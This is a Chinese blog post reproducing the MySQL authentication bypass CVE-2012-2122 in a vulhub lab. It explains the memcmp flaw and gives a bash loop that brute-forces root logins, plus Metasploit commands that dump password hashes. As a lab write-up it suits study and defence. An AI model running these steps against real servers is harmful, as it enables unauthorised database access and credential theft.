当前位置:网站首页>【vulhub】MySql身份认证绕过漏洞复现(CVE-2012-2122)
【vulhub】MySql身份认证绕过漏洞复现(CVE-2012-2122)
2022-08-10 20:37:00 【errorr0】
影响版本:
MySQL 5.1.x before 5.1.63,
5.5.x before 5.5.24,
5.6.x before 5.6.6,
MariaDB 5.1.x before 5.1.62,
5.2.x before 5.2.12
5.3.x before 5.3.6
5.x before 5.5.23
漏洞出现的原理:
当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。也就是说只要知道用户名且支持远程登录,然后不断尝试就能够直接登入SQL数据库。还有一个方法 msfconsole工具利用其带的SQL语句爆出密码,但是经过自己的测试发现无法得到密码(这里msf用的是自己服务器上搭的,可能存在问题)。
漏洞复现
法一:脚本循环爆破
正常登录:
用户:root 密码:123456
不正常就不会登录成功,但是如果写一个脚本循环进行登录就会出现开始说的MySQL可能出现的问题,如下:
#mysql.sh
for ((i = 1; i < 1000; i++))
do
mysql -h 127.0.0.1 -u root -p1234 -P 3306;
done
执行命令:bash mysql.sh
可以看到,即使前面一直在报错,但是到达了某一步时还是会登录成功,并且是拥有可执行查询权限的。
法二:metasploit工具打
这个工具kali自带,之前打红日2的时候用过,没有kali的可以参考安装教程:https://jingyan.baidu.com/article/2c8c281dabacad0008252aa6.html
步骤如下:
msfconsole
use auxiliary/scanner/mysql/mysql_authbypass_hashdump
set RHOSTS 你的外网IP
set THREADS 100
run
可惜了,一直不出结果,有可能是我搭的这个msf有问题还是啥的,MySQL的远程连接、错误连接次数的限制都改了还是不行,工作的电脑没有装kali,回去用自己电脑的kali试试吧。
边栏推荐
- YOLOv3 SPP source analysis
- leetcode:45. 跳跃游戏II
- 导入FontForge生成字体
- 【nvm】【node多版本管理工具】使用说明和踩坑(exit status 1)
- 机器学习笔记:t-SNE
- Common functions of Auto.js to find pictures and colors
- Single-click to cancel the function
- Multifunctional Nanozyme Ag/PANI | Flexible Substrate Nano ZnO Enzyme | Rhodium Sheet Nanozyme | Ag-Rh Alloy Nanoparticle Nanozyme | Iridium Ruthenium Alloy/Iridium Oxide Biomimetic Nanozyme
- 【一致性hash】负载均衡器分发请求
- 组合导航精度分析
猜你喜欢
【golang map】 深入了解map内部存储协议
七月券商金工精选
Ransom Letter Questions and Answers
Future-oriented IT infrastructure management architecture - Unified IaaS
机器学习模型验证:被低估的重要一环
线性结构----链表
npm warn config global `--global`, `--local` are deprecated. use `--location=global` instead.
大小端的理解以及宏定义实现的理解
A fullGC problem troubleshooting caused by groovy
[mysql] 深入分析MySQL版本控制MVCC规则
随机推荐
面向未来的 IT 基础设施管理架构——融合云(Unified IaaS)
Auto.js找图找色常用功能
“蔚来杯“2022牛客暑期多校训练营7 F
[Golang]用反射让你的代码变优美
报错:runtime error: reference binding to null pointer of type ‘std::vector<int, std::allocator<int>>‘
【二叉树】二叉搜索树的后序遍历序列
双 TL431 级联振荡器
机器学习模型验证:被低估的重要一环
第五届“强网杯”全国网络安全挑战赛(线上赛)
参天生长大模型:昇腾AI如何强壮模型开发与创新之根?
论配置化系统的配置
ansible各个模块的详解和使用
[CNN] Brush SOTA's trick
优雅退出在Golang中的实现
实施MES管理系统前,这三个问题要考虑好
Ransom Letter Questions and Answers
【图像分类】2018-MobileNetV2
Getting started with kuberentes Auditing
Transferrin-modified osthole long-circulating liposomes/PEG-PLGA nanoparticles loaded with notoginsenoside R1 ([email prot
1D Array Dynamics and Question Answers